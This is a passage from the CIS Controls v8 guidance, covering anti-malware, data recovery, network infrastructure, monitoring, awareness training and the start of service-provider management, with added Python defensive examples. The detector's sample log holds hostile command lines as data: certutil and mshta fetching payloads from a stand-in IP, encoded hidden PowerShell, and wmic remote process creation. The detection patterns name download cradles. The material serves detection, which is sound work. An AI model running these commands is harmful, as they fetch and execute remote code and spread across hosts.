so signature-based defenses have nothing new to match on and the only evidence is how a
legitimate tool was invoked. Enabling logging, as per the Safeguards in CIS Control 8, will
make it significantly easier for the enterprise to follow the events to understand what
happened and why it happened.
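Centrally collected process-creation logs are where living-off-the-land activity becomes visible: certutil.exe and powershell.exe are signed, trusted binaries, so the signal is in their command lines. The following is an added example in Python, not from the CIS document or any EDR product. The detection rules are hypothetical starting points, and the log lines are constructed to resemble Sysmon-style process-creation events serialized as JSON; hosts, users and addresses are invented.

```python
"""Flag living-off-the-land process activity in centrally collected
process-creation logs (added example, not from the CIS document).

Rules key on how a built-in tool was invoked rather than on the binary
itself. The rule list is a hypothetical starting set; the events are
constructed JSON lines resembling Sysmon/EDR process-creation records.
"""
import json
import re

# Constructed sample events (hypothetical hosts, users, paths and addresses).
SAMPLE_LOG = r"""
{"host":"ws-014","user":"jdoe","image":"C:\\Windows\\System32\\certutil.exe","cmd":"certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\\Users\\Public\\x.exe"}
{"host":"ws-014","user":"jdoe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"}
{"host":"srv-02","user":"svc_backup","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"host":"ws-022","user":"asmith","image":"C:\\Windows\\System32\\mshta.exe","cmd":"mshta.exe http://198.51.100.7/a.hta"}
{"host":"ws-022","user":"asmith","image":"C:\\Windows\\System32\\notepad.exe","cmd":"notepad.exe C:\\Users\\asmith\\notes.txt"}
{"host":"ws-014","user":"jdoe","image":"C:\\Windows\\System32\\wbem\\WMIC.exe","cmd":"wmic.exe /node:srv-02 process call create \"cmd /c whoami\""}
"""

# (rule name, case-insensitive regex over the command line)
RULES = [
    ("certutil download", r"certutil(\.exe)?\s.*-urlcache"),
    ("powershell encoded command", r"powershell(\.exe)?\s.*-(e|enc|encodedcommand)\s"),
    ("powershell download cradle", r"(Invoke-WebRequest|DownloadString|Net\.WebClient)"),
    ("mshta/rundll32 remote script", r"(mshta|rundll32)(\.exe)?\s.*(https?://|javascript:)"),
    ("wmic remote process create", r"wmic(\.exe)?\s.*process\s+call\s+create"),
]

def parse_events(text):
    """One JSON object per non-empty line -> list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def match_rules(event):
    """Names of every rule whose pattern matches the event's command line."""
    cmd = event.get("cmd", "")
    return [name for name, pattern in RULES if re.search(pattern, cmd, re.IGNORECASE)]

def detect(text):
    """Return [(host, user, [matched rule names])] for events that hit any rule."""
    hits = []
    for event in parse_events(text):
        matched = match_rules(event)
        if matched:
            hits.append((event["host"], event["user"], matched))
    return hits

if __name__ == "__main__":
    for host, user, rules in detect(SAMPLE_LOG):
        print(f"{host} {user}: {', '.join(rules)}")
```

Two of the six constructed events are ordinary administration (a scheduled backup script and a text editor) and produce no hit; the other four are flagged by the argument patterns alone, which is the point: the same certutil.exe that a signature scanner trusts is the download tool.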


Safeguards
Each entry gives the number and title, then asset type | security function | implementation groups, then the description.

10.1 Deploy and Maintain Anti-Malware Software
Devices | Protect | IG1, IG2, IG3
Deploy and maintain anti-malware software on all enterprise assets.

10.2 Configure Automatic Anti-Malware Signature Updates
Devices | Protect | IG1, IG2, IG3
Configure automatic updates for anti-malware signature files on all enterprise assets.

10.3 Disable Autorun and Autoplay for Removable Media
Devices | Protect | IG1, IG2, IG3
Disable autorun and autoplay auto-execute functionality for removable media.

10.4 Configure Automatic Anti-Malware Scanning of Removable Media
Devices | Detect | IG2, IG3
Configure anti-malware software to automatically scan removable media.

10.5 Enable Anti-Exploitation Features
Devices | Protect | IG2, IG3
Enable anti-exploitation features on enterprise assets and software, where possible, such as Microsoft® Data Execution Prevention (DEP), Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protection (SIP) and Gatekeeper™.


Control 11: Data Recovery
Safeguards: 5 total; IG1 4/5; IG2 5/5; IG3 5/5

Overview: Establish and maintain data recovery practices sufficient to restore in-scope
enterprise assets to a pre-incident and trusted state.

Why is this Control critical?

In the cybersecurity triad of Confidentiality, Integrity, and Availability (CIA), the availability of
data is, in some cases, more critical than its confidentiality. Enterprises need many types of
data to make business decisions, and when that data is not available or is untrusted, it
could impact the enterprise. An easy example is weather information for a transportation
enterprise.

When attackers compromise assets, they make changes to configurations, add accounts, and
often add software or scripts. These changes are not always easy to identify, as attackers might
have corrupted or replaced trusted applications with malicious versions, or the changes might
appear to be standard-looking account names. Configuration changes can include adding or
changing registry entries, opening ports, turning off security services, deleting logs, or other
malicious actions that make a system insecure. These actions do not have to be malicious;
human error can cause each of these as well. Therefore, it is important to have recent
backups or mirrors to recover enterprise assets and data back to a known trusted state.

There has been an exponential rise in ransomware over the last few years. It is not a new
threat, though it has become more commercialized and organized as a reliable method for
attackers to make money. If an attacker encrypts an enterprise's data and demands ransom for
its restoration, having a recent backup to recover to a known, trusted state can be helpful.
However, as ransomware has evolved, it has also become an extortion technique, where data
is exfiltrated before being encrypted, and the attacker asks for payment to restore the
enterprise's data, as well as to keep it from being sold or publicized. In this case, restoration
only solves the problem of returning systems to a trusted state and continuing operations; it
does nothing about the stolen copy. Leveraging the guidance within the CIS Controls will help
reduce the risk of ransomware through improved cyber hygiene, as attackers usually use older
or basic exploits on insecure systems.


Procedures and tools

Data recovery procedures should be defined in the data management process described in CIS
Control 3, Data Protection. This should include backup procedures based on data value,
sensitivity, or retention requirements. This will assist in developing backup frequency and type
(full vs. incremental).

Once per quarter (or whenever a new backup process or technology is introduced), a
testing team should evaluate a random sampling of backups and attempt to restore them
on a test bed environment. The restored backups should be verified to ensure that the
operating system, application, and data from the backup are all intact and functional.

In the event of malware infection, restoration procedures should use a version of the backup
that is believed to predate the original infection.
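The quarterly restore test and the "predates the infection" rule above both need two things the backup job itself does not give you: a record of what each backup should contain, and a way to pick the right one. The following is an added example in Python, not from the CIS document or any backup product. Backups are represented as in-memory {path: bytes} trees so the example runs without a filesystem; the file contents, timestamps and infection time are constructed.

```python
"""Restore-test helper for Safeguard 11.5 and the predates-the-infection
rule (added example, not part of the CIS document).

A backup is trustworthy only if a restore reproduces the files byte for
byte and the copy was taken before the compromise. This keeps a manifest
of SHA-256 digests per backup, verifies a restored tree against it, and
picks the newest backup older than a given infection time. Trees are
in-memory dicts {path: bytes} so the example needs no filesystem.
"""
import hashlib
from datetime import datetime

def manifest(files):
    """{path: bytes} -> {path: sha256 hex digest}; written alongside each backup."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}

def verify_restore(restored, expected_manifest):
    """Compare a restored tree to the manifest it was backed up with.
    Returns a list of problems; an empty list means the restore is intact."""
    problems = []
    for path, digest in expected_manifest.items():
        if path not in restored:
            problems.append(f"missing: {path}")
        elif hashlib.sha256(restored[path]).hexdigest() != digest:
            problems.append(f"corrupt: {path}")
    for path in sorted(restored.keys() - expected_manifest.keys()):
        problems.append(f"unexpected: {path}")
    return problems

def last_clean_backup(backups, infection_time):
    """backups: [(timestamp, manifest)]. Return the newest one taken strictly
    before infection_time, or None if every backup postdates the compromise."""
    candidates = [b for b in backups if b[0] < infection_time]
    return max(candidates, key=lambda b: b[0]) if candidates else None

# Constructed sample: three nightly backups; the third was taken after a
# hypothetical infection that replaced a trusted binary and dropped a file.
GOOD = {"etc/app.conf": b"port=8443\n", "bin/agent": b"\x7fELF...trusted"}
TAMPERED = {"etc/app.conf": b"port=8443\n", "bin/agent": b"\x7fELF...replaced",
            "tmp/.x": b"dropper"}
BACKUPS = [
    (datetime(2023, 5, 1, 2, 0), manifest(GOOD)),
    (datetime(2023, 5, 2, 2, 0), manifest(GOOD)),
    (datetime(2023, 5, 3, 2, 0), manifest(TAMPERED)),
]
INFECTION = datetime(2023, 5, 2, 14, 30)

if __name__ == "__main__":
    when, expected = last_clean_backup(BACKUPS, INFECTION)
    print("restore from", when.isoformat())
    print("clean restore problems:", verify_restore(GOOD, expected))
    print("tampered tree problems:", verify_restore(TAMPERED, expected))
```

The manifest must be stored with the same protection as the backup (Safeguard 11.3) and ideally in the isolated copy (11.4); an attacker who can rewrite both the data and its manifest defeats the check. Note that the 3 May backup verifies perfectly against its own manifest, which is why the selection step by infection time is needed and hash verification alone is not enough.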

Safeguards
Each entry gives the number and title, then asset type | security function | implementation groups, then the description.

11.1 Establish and Maintain a Data Recovery Process
Data | Recover | IG1, IG2, IG3
Establish and maintain a data recovery process. In the process, address the scope of data recovery activities, recovery prioritization, and the security of backup data. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

11.2 Perform Automated Backups
Data | Recover | IG1, IG2, IG3
Perform automated backups of in-scope enterprise assets. Run backups weekly, or more frequently, based on the sensitivity of the data.

11.3 Protect Recovery Data
Data | Protect | IG1, IG2, IG3
Protect recovery data with equivalent controls to the original data. Reference encryption or data separation, based on requirements.

11.4 Establish and Maintain an Isolated Instance of Recovery Data
Data | Recover | IG1, IG2, IG3
Establish and maintain an isolated instance of recovery data. Example implementations include version controlling backup destinations through offline, cloud, or off-site systems or services.

11.5 Test Data Recovery
Data | Recover | IG2, IG3
Test backup recovery quarterly, or more frequently, for a sampling of in-scope enterprise assets.



Control 12: Network Infrastructure Management
Safeguards: 8 total; IG1 1/8; IG2 7/8; IG3 8/8

Overview: Establish, implement, and actively manage (track, report, correct) network devices,
in order to prevent attackers from exploiting vulnerable network services and access points.

Why is this Control critical?

Secure network infrastructure is an essential defense against attacks. This includes an
appropriate security architecture, addressing vulnerabilities that are, oftentimes, introduced
with default settings, monitoring for changes, and reassessment of current configurations.
Network infrastructure includes devices such as physical and virtualized gateways, firewalls,
wireless access points, routers, and switches.

Default configurations for network devices are geared for ease-of-deployment and ease-of-
use, not security. Potential default vulnerabilities include open services and ports, default
accounts and passwords (including service accounts), support for older vulnerable protocols,
and pre-installation of unneeded software. Attackers search for vulnerable default settings,
gaps or inconsistencies in firewall rule sets, routers, and switches and use those holes to
penetrate defenses. They exploit flaws in these devices to gain access to networks, redirect
traffic on a network, and intercept data while in transmission.

Network security is a constantly changing environment that necessitates regular re-evaluation
of architecture diagrams, configurations, access controls, and allowed traffic flows.
Attackers take advantage of network device configurations becoming less secure over time as
users demand exceptions for specific business needs. Sometimes the exceptions are
deployed, but not removed when they are no longer applicable to the business's needs. In
some cases, the security risk of an exception is neither properly analyzed nor measured
against the associated business need, and that risk can change over time.

Procedures and tools

Enterprises should ensure network infrastructure is fully documented and architecture
diagrams are kept up-to-date. It is important for key infrastructure components to have
vendor support for patches and feature upgrades. Upgrade End-of-Life (EOL) components
before the date they will be out of support, or apply mitigating controls to isolate them.
Enterprises need to monitor their infrastructure versions and configurations for
vulnerabilities that would require them to upgrade the network devices to the latest secure
and stable version that does not impact the infrastructure.

An up-to-date network architecture diagram, including security architecture diagrams, is an
important foundation for infrastructure management. Next is having complete account
management for access control, logging, and monitoring. Finally, infrastructure administration
should only be performed over secure protocols, with strong authentication (MFA for
privileged access management (PAM)), and from dedicated administrative devices or
out-of-band networks.

Commercial tools can be helpful to evaluate the rule sets of network filtering devices to
determine whether they are consistent or in conflict. This provides an automated sanity check
of network filters. These tools search for errors in rule sets or Access Control Lists (ACLs) that
may allow unintended services through the network device: for example, a broad permit
placed ahead of the deny that was meant to block the same traffic, or a rule that is never
reached because an earlier rule already matches everything it would. Such tools should be run
each time significant changes are made to firewall rule sets, router ACLs, or other filtering
technologies.

→ For telework and small office guidance, refer to the CIS Controls Telework and Small
Office Network Security Guide – https://www.cisecurity.org/controls/v8/
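The rule-set sanity check described above comes down to two set comparisons on a first-match-wins list: is a later rule completely covered by an earlier one (it is dead), and does an earlier rule with the opposite action overlap a later one (the earlier rule silently decides part of that traffic). The following is an added example in Python, not a CIS or vendor tool; the rule set is constructed and a real run would load it from the device's exported configuration.

```python
"""Sanity-check an ordered, first-match-wins firewall rule set for shadowed
and conflicting rules (added example, not a CIS or vendor tool). The rule
set below is hypothetical; real analysis would load the device export.
"""
from dataclasses import dataclass
import ipaddress

@dataclass(frozen=True)
class Rule:
    name: str
    action: str      # "allow" or "deny"
    src: str         # source CIDR
    dst: str         # destination CIDR
    ports: tuple     # inclusive (low, high) destination port range

def _net(cidr):
    return ipaddress.ip_network(cidr, strict=False)

def covers(outer, inner):
    """True when every packet matched by inner is also matched by outer."""
    return (_net(inner.src).subnet_of(_net(outer.src))
            and _net(inner.dst).subnet_of(_net(outer.dst))
            and outer.ports[0] <= inner.ports[0]
            and inner.ports[1] <= outer.ports[1])

def overlaps(a, b):
    """True when at least one packet is matched by both rules."""
    return (_net(a.src).overlaps(_net(b.src))
            and _net(a.dst).overlaps(_net(b.dst))
            and a.ports[0] <= b.ports[1] and b.ports[0] <= a.ports[1])

def is_any_any_allow(rule):
    return (rule.action == "allow" and _net(rule.src).prefixlen == 0
            and _net(rule.dst).prefixlen == 0 and rule.ports == (0, 65535))

def analyse(rules):
    """Return findings, in rule order:
    - a rule completely covered by an earlier rule is dead (shadowed);
    - an earlier rule with the opposite action that overlaps a later one
      decides part of the later rule's traffic before it is reached;
    - an allow from anywhere to anywhere on any port is reported outright.
    """
    findings = []
    for i, later in enumerate(rules):
        if is_any_any_allow(later):
            findings.append(f"{later.name}: allows any source to any destination on any port")
        for earlier in rules[:i]:
            if covers(earlier, later):
                findings.append(f"{later.name}: shadowed by {earlier.name} ({earlier.action})")
                break
            if earlier.action != later.action and overlaps(earlier, later):
                findings.append(f"{later.name}: partially overridden by {earlier.name} ({earlier.action})")
    return findings

# Constructed rule set: management SSH, a public web server, a deny for all
# other SSH, a stale per-host SSH rule, and a "temporary" exception never removed.
RULES = [
    Rule("r1-mgmt-ssh", "allow", "10.0.9.0/24", "10.0.0.0/8", (22, 22)),
    Rule("r2-public-web", "allow", "0.0.0.0/0", "10.0.1.10/32", (443, 443)),
    Rule("r3-deny-ssh", "deny", "0.0.0.0/0", "10.0.0.0/8", (22, 22)),
    Rule("r4-old-ssh", "allow", "10.0.9.5/32", "10.0.2.0/24", (22, 22)),
    Rule("r5-temp-exception", "allow", "0.0.0.0/0", "0.0.0.0/0", (0, 65535)),
]

if __name__ == "__main__":
    for line in analyse(RULES):
        print(line)
```

Not every finding is a defect: r3 being partially overridden by r1 is the intended carve-out for the management subnet, and the analyst marks it as accepted. The value is that r4 (dead) and r5 (the forgotten exception that makes r3 pointless for everything after it) surface on every run, which is what the Safeguard's "run after each significant change" is for. Protocol (TCP/UDP) and source ports are omitted here to keep the example short; a production check needs them.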

Safeguards
Each entry gives the number and title, then asset type | security function | implementation groups, then the description.

12.1 Ensure Network Infrastructure is Up-to-Date
Network | Protect | IG1, IG2, IG3
Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.

12.2 Establish and Maintain a Secure Network Architecture
Network | Protect | IG2, IG3
Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.

12.3 Securely Manage Network Infrastructure
Network | Protect | IG2, IG3
Securely manage network infrastructure. Example implementations include version-controlled infrastructure-as-code, and the use of secure network protocols, such as SSH and HTTPS.

12.4 Establish and Maintain Architecture Diagram(s)
Network | Identify | IG2, IG3
Establish and maintain architecture diagram(s) and/or other network system documentation. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

12.5 Centralize Network Authentication, Authorization, and Auditing (AAA)
Network | Protect | IG2, IG3
Centralize network AAA.

12.6 Use of Secure Network Management and Communication Protocols
Network | Protect | IG2, IG3
Use secure network management and communication protocols (e.g., 802.1X, Wi-Fi Protected Access 2 (WPA2) Enterprise or greater).

12.7 Ensure Remote Devices Utilize a VPN and are Connecting to an Enterprise's AAA Infrastructure
Devices | Protect | IG2, IG3
Require users to authenticate to enterprise-managed VPN and authentication services prior to accessing enterprise resources on end-user devices.

12.8 Establish and Maintain Dedicated Computing Resources for All Administrative Work
Devices | Protect | IG3
Establish and maintain dedicated computing resources, either physically or logically separated, for all administrative tasks or tasks requiring administrative access. The computing resources should be segmented from the enterprise's primary network and not be allowed internet access.



Control 13: Network Monitoring and Defense
Safeguards: 11 total; IG1 0/11; IG2 6/11; IG3 11/11

Overview: Operate processes and tooling to establish and maintain comprehensive network
monitoring and defense against security threats across the enterprise's network infrastructure
and user base.

Why is this Control critical?

We cannot rely on network defenses to be perfect. Adversaries continue to evolve and
mature, as they share, or sell, information among their community on exploits and bypasses
to security controls. Even if security tools work "as advertised," it takes an understanding of
the enterprise risk posture to configure, tune, and log them to be effective. Often,
misconfigurations due to human error or lack of knowledge of tool capabilities give
enterprises a false sense of security.

Security tools can only be effective if they are supporting a process of continuous monitoring
that allows staff the ability to be alerted and respond to security incidents quickly. Enterprises
that adopt a purely technology-driven approach will also experience more false positives, due
to their over-reliance on alerts from tools. Identifying and responding to these threats requires
visibility into all threat vectors of the infrastructure and leveraging humans in the process of
detection, analysis, and response. It is critical for large or heavily targeted enterprises to have
a security operations capability to prevent, detect, and quickly respond to cyber threats before
they can impact the enterprise. This process will generate activity reports and metrics that will
help enhance security policies, and support regulatory compliance for many enterprises.

As we have seen many times in the press, enterprises have been compromised for weeks,
months, or years before discovery. The primary benefit of having comprehensive situational
awareness is to increase the speed of detection and response. This is critical to respond
quickly when malware is discovered, credentials are stolen, or when sensitive data is
compromised, to reduce impact to the enterprise.

Through good situational awareness (i.e., security operations), enterprises will identify and
catalog Tactics, Techniques, and Procedures (TTPs) of attackers, including their IOCs, that will
help the enterprise become more proactive in identifying future threats or incidents. Recovery
can be achieved faster when the response team has access to complete information about the
environment and enterprise structure to develop efficient response strategies.

Procedures and tools

Most enterprises do not need to stand up a Security Operations Center (SOC) to gain
situational awareness. This starts with first understanding critical business functions,
network and server architectures, data and data flows, vendor service and business partner
connections, and end-user devices and accounts. This informs the development of a security
architecture, technical controls, logging, monitoring, and response procedures.

At the core of this process is a trained and organized team that implements processes for
incident detection, analysis, and mitigation. These capabilities could be conducted internally,
or through consultants or a managed service provider. Enterprises should consider network,
enterprise asset, user credential, and data access activities. Technology will play a crucial role
to collect and analyze all of the data, and monitor networks and enterprise assets internally
and externally to the enterprise. Enterprises should include visibility into cloud platforms that
might not be covered by on-premises security technology.

Forwarding all important logs to analytical programs, such as Security Information and Event
Management (SIEM) solutions, can provide value; however, they do not provide a complete
picture. Weekly log reviews are necessary to tune thresholds and identify abnormal events.
Correlation tools can make audit logs more useful for subsequent manual inspection. These
tools are not a replacement for skilled information security personnel and system
administrators. Even with automated log analysis tools, human expertise and intuition are
often required to identify and understand attacks.

As this process matures, enterprises will create, maintain, and evolve a knowledge base that
will help to understand and assess the business risks, developing an internal threat intelligence
capability. Threat intelligence is the collection of TTPs from incidents and adversaries. To
accomplish this, a situational awareness program will define and evaluate which information
sources are relevant to detect, report, and handle attacks. The most mature enterprises can
evolve to threat hunting, where trained staff manually review system and user logs, data flows,
and traffic patterns to find anomalies.

Safeguards
Each entry gives the number and title, then asset type | security function | implementation groups, then the description.

13.1 Centralize Security Event Alerting
Network | Detect | IG2, IG3
Centralize security event alerting across enterprise assets for log correlation and analysis. Best practice implementation requires the use of a SIEM, which includes vendor-defined event correlation alerts. A log analytics platform configured with security-relevant correlation alerts also satisfies this Safeguard.

13.2 Deploy a Host-Based Intrusion Detection Solution
Devices | Detect | IG2, IG3
Deploy a host-based intrusion detection solution on enterprise assets, where appropriate and/or supported.

13.3 Deploy a Network Intrusion Detection Solution
Network | Detect | IG2, IG3
Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.

13.4 Perform Traffic Filtering Between Network Segments
Network | Protect | IG2, IG3
Perform traffic filtering between network segments, where appropriate.

13.5 Manage Access Control for Remote Assets
Devices | Protect | IG2, IG3
Manage access control for assets remotely connecting to enterprise resources. Determine the amount of access to enterprise resources based on: up-to-date anti-malware software installed, configuration compliance with the enterprise's secure configuration process, and ensuring the operating system and applications are up-to-date.

13.6 Collect Network Traffic Flow Logs
Network | Detect | IG2, IG3
Collect network traffic flow logs and/or network traffic from network devices to review and alert upon.

13.7 Deploy a Host-Based Intrusion Prevention Solution
Devices | Protect | IG3
Deploy a host-based intrusion prevention solution on enterprise assets, where appropriate and/or supported. Example implementations include use of an Endpoint Detection and Response (EDR) client or host-based IPS agent.

13.8 Deploy a Network Intrusion Prevention Solution
Network | Protect | IG3
Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.

13.9 Deploy Port-Level Access Control
Devices | Protect | IG3
Deploy port-level access control. Port-level access control utilizes 802.1x, or similar network access control protocols, such as certificates, and may incorporate user and/or device authentication.

13.10 Perform Application Layer Filtering
Network | Protect | IG3
Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.

13.11 Tune Security Event Alerting Thresholds
Network | Detect | IG3
Tune security event alerting thresholds monthly, or more frequently.
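Safeguards 13.6 and 13.11 together say: collect flow records, alert on them, and revisit the thresholds. What that looks like in practice is a small amount of logic over the flows with the thresholds exposed as parameters. The following is an added example in Python, not from the CIS document or any NIDS or SIEM. The flow records are a constructed NetFlow-style CSV with invented addresses, and the threshold values are hypothetical starting points, which is exactly what monthly tuning adjusts.

```python
"""Review network flow records for scanning and beaconing (added example,
not from the CIS document). The flows are a constructed NetFlow-style CSV,
one record per connection; the thresholds are hypothetical starting values
and are the knobs Safeguard 13.11 says to revisit monthly.
"""
import csv
import io
import statistics
from collections import defaultdict

# Constructed flows (epoch seconds, invented addresses): a host checking in
# every ~60 s, a normal user browsing irregularly, and a host sweeping ports.
FLOWS = """ts,src,dst,dport,bytes
1000,10.0.5.21,203.0.113.9,443,812
1060,10.0.5.21,203.0.113.9,443,805
1121,10.0.5.21,203.0.113.9,443,799
1179,10.0.5.21,203.0.113.9,443,810
1240,10.0.5.21,203.0.113.9,443,808
1010,10.0.5.40,203.0.113.50,443,15320
1300,10.0.5.40,203.0.113.50,443,2201
1320,10.0.5.40,203.0.113.50,443,48811
1900,10.0.5.40,203.0.113.50,443,901
2400,10.0.5.40,203.0.113.50,443,7733
1005,10.0.7.3,10.0.1.10,21,60
1005,10.0.7.3,10.0.1.10,22,60
1005,10.0.7.3,10.0.1.10,23,60
1006,10.0.7.3,10.0.1.10,25,60
1006,10.0.7.3,10.0.1.10,80,60
1006,10.0.7.3,10.0.1.10,110,60
1007,10.0.7.3,10.0.1.10,135,60
1007,10.0.7.3,10.0.1.10,139,60
1007,10.0.7.3,10.0.1.10,443,60
1008,10.0.7.3,10.0.1.10,445,60
1008,10.0.7.3,10.0.1.10,3389,60
"""

def parse_flows(text):
    """CSV text -> list of dicts with integer ts, dport and bytes."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        for key in ("ts", "dport", "bytes"):
            row[key] = int(row[key])
    return rows

def port_scans(flows, min_targets=10):
    """Sources that touched at least min_targets distinct (dst, dport) pairs.
    Returns {src: count}. Raise min_targets if normal hosts trip it."""
    touched = defaultdict(set)
    for f in flows:
        touched[f["src"]].add((f["dst"], f["dport"]))
    return {src: len(t) for src, t in touched.items() if len(t) >= min_targets}

def beacons(flows, min_flows=5, max_jitter=0.2):
    """(src, dst, dport) -> mean interval, for series of at least min_flows
    connections whose gaps vary by less than max_jitter (coefficient of
    variation). Human traffic is bursty; implants check in on a clock."""
    series = defaultdict(list)
    for f in flows:
        series[(f["src"], f["dst"], f["dport"])].append(f["ts"])
    found = {}
    for key, ts in series.items():
        if len(ts) < min_flows:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean < max_jitter:
            found[key] = mean
    return found

if __name__ == "__main__":
    flows = parse_flows(FLOWS)
    print("scans:", port_scans(flows))
    print("beacons:", beacons(flows))
```

The browsing host reaches the five-flow minimum but its gaps vary far too much to be a beacon, and the scanner never contacts the same (dst, dport) twice, so neither detection fires on the other's pattern. Tuning in the sense of 13.11 means looking at what each threshold missed or over-alerted on in the past month (a vulnerability scanner that legitimately sweeps ports, an implant that adds random sleep so that max_jitter needs loosening) and adjusting, with the allowlisting of known scanners done explicitly rather than by raising the threshold for everyone.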



Control 14: Security Awareness and Skills Training
Safeguards: 9 total; IG1 8/9; IG2 9/9; IG3 9/9

Overview: Establish and maintain a security awareness program to influence behavior among
the workforce to be security conscious and properly skilled to reduce cybersecurity risks to
the enterprise.

Why is this Control critical?

The actions of people play a critical part in the success or failure of an enterprise's security
program. It is easier for an attacker to entice a user to click a link or open an email attachment
to install malware in order to get into an enterprise, than to find a network exploit to do it
directly.

Users themselves, both intentionally and unintentionally, can cause incidents as a result of
mishandling sensitive data, sending an email with sensitive data to the wrong recipient, losing
a portable end-user device, using weak passwords, or using the same password they use on
public sites.

No security program can effectively address cyber risk without a means to address this
fundamental human vulnerability. Users at every level of the enterprise have different risks.
For example: executives manage more sensitive data; system administrators have the ability
to control access to systems and applications; and users in finance, human resources, and
contracts all have access to different types of sensitive data that can make them targets.

The training should be updated regularly. This will strengthen the culture of security and
discourage risky workarounds.

Procedures and tools

An effective security awareness training program should not just be a canned, once-a-year
training video coupled with regular phishing testing. While annual training is needed, there
should also be more frequent, topical messages and notifications about security. This might
include messages about: strong password use that coincides with a media report of a password
dump, the rise of phishing during tax time, or increased awareness of malicious package
delivery emails during the holidays.

Training should also consider the enterprise's different regulatory and threat posture. Financial
firms might have more compliance-related training on data handling and use, healthcare
enterprises on handling healthcare data, and merchants on credit card data.

Social engineering training, such as phishing tests, should also include awareness of tactics
that target different roles. For example, the finance team will receive Business Email
Compromise (BEC) attempts posing as executives asking to wire money, or receive emails
from compromised partners or vendors asking to change the bank account information for
their next payment.

For a more comprehensive treatment of this topic, the following resources are helpful to build
an effective security awareness program:

→ NIST® SP 800-50 Infosec Awareness Training – https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-50.pdf

→ National Cyber Security Centre (UK) – https://www.ncsc.gov.uk/guidance/10-steps-user-education-and-awareness

→ EDUCAUSE – https://www.educause.edu/focus-areas-and-initiatives/policy-and-security/cybersecurity-program/awareness-campaigns

→ National Cyber Security Alliance (NCSA) – https://staysafeonline.org/

→ SANS – https://www.sans.org/security-awareness-training/resources

→ For guidance on configuring home routers see the CIS Controls Telework and Small Office Network
Security Guide – https://www.cisecurity.org/white-papers/cis-controls-telework-and-small-office-network-security-guide/

Safeguards
Each entry gives the number and title, then asset type | security function | implementation groups, then the description.

14.1 Establish and Maintain a Security Awareness Program
N/A | Protect | IG1, IG2, IG3
Establish and maintain a security awareness program. The purpose of a security awareness program is to educate the enterprise's workforce on how to interact with enterprise assets and data in a secure manner. Conduct training at hire and, at a minimum, annually. Review and update content annually, or when significant enterprise changes occur that could impact this Safeguard.

14.2 Train Workforce Members to Recognize Social Engineering Attacks
N/A | Protect | IG1, IG2, IG3
Train workforce members to recognize social engineering attacks, such as phishing, pre-texting, and tailgating.

14.3 Train Workforce Members on Authentication Best Practices
N/A | Protect | IG1, IG2, IG3
Train workforce members on authentication best practices. Example topics include MFA, password composition, and credential management.

14.4 Train Workforce on Data Handling Best Practices
N/A | Protect | IG1, IG2, IG3
Train workforce members on how to identify and properly store, transfer, archive, and destroy sensitive data. This also includes training workforce members on clear screen and desk best practices, such as locking their screen when they step away from their enterprise asset, erasing physical and virtual whiteboards at the end of meetings, and storing data and assets securely.

14.5 Train Workforce Members on Causes of Unintentional Data Exposure
N/A | Protect | IG1, IG2, IG3
Train workforce members to be aware of causes for unintentional data exposure. Example topics include mis-delivery of sensitive data, losing a portable end-user device, or publishing data to unintended audiences.

14.6 Train Workforce Members on Recognizing and Reporting Security Incidents
N/A | Protect | IG1, IG2, IG3
Train workforce members to be able to recognize a potential incident and be able to report such an incident.

14.7 Train Workforce on How to Identify and Report if Their Enterprise Assets are Missing Security Updates
N/A | Protect | IG1, IG2, IG3
Train workforce to understand how to verify and report out-of-date software patches or any failures in automated processes and tools. Part of this training should include notifying IT personnel of any failures in automated processes and tools.

14.8 Train Workforce on the Dangers of Connecting to and Transmitting Enterprise Data Over Insecure Networks
N/A | Protect | IG1, IG2, IG3
Train workforce members on the dangers of connecting to, and transmitting data over, insecure networks for enterprise activities. If the enterprise has remote workers, training must include guidance to ensure that all users securely configure their home network infrastructure.

14.9 Conduct Role-Specific Security Awareness and Skills Training
N/A | Protect | IG2, IG3
Conduct role-specific security awareness and skills training. Example implementations include secure system administration courses for IT professionals, OWASP® Top 10 vulnerability awareness and prevention training for web application developers, and advanced social engineering awareness training for high-profile roles.

Control 15: Service Provider Management
Safeguards: 7 total; IG1 1/7; IG2 4/7; IG3 7/7

Overview: Develop a process to evaluate service providers who hold sensitive data, or are
responsible for an enterprise's critical IT platforms or processes, to ensure these providers are
protecting those platforms and data appropriately.

Why is this Control critical?

In our modern, connected world, enterprises rely on vendors and partners to help manage
their data or rely on third-party infrastructure for core applications or functions.

There have been numerous examples where third-party breaches have significantly impacted
an enterprise; for example, as early as the late 2000s, payment cards were compromised after
attackers infiltrated smaller third-party vendors in the retail industry. More recent examples
include ransomware attacks that impact an enterprise indirectly, due to one of their service
providers being locked down, causing disruption to business. Or worse, if directly connected, a
ransomware attack could encrypt data on the main enterprise.

Most data security and privacy regulations require their protection to extend to third-party
service providers, such as with Health Insurance Portability and Accountability Act (HIPAA)
Business Associate agreements in healthcare, Federal Financial Institutions Examination
Council (FFIEC) requirements for the financial industry, and the United Kingdom (U.K.) Cyber
Essentials. Third-party trust is a core Governance, Risk, and Compliance (GRC) function, as
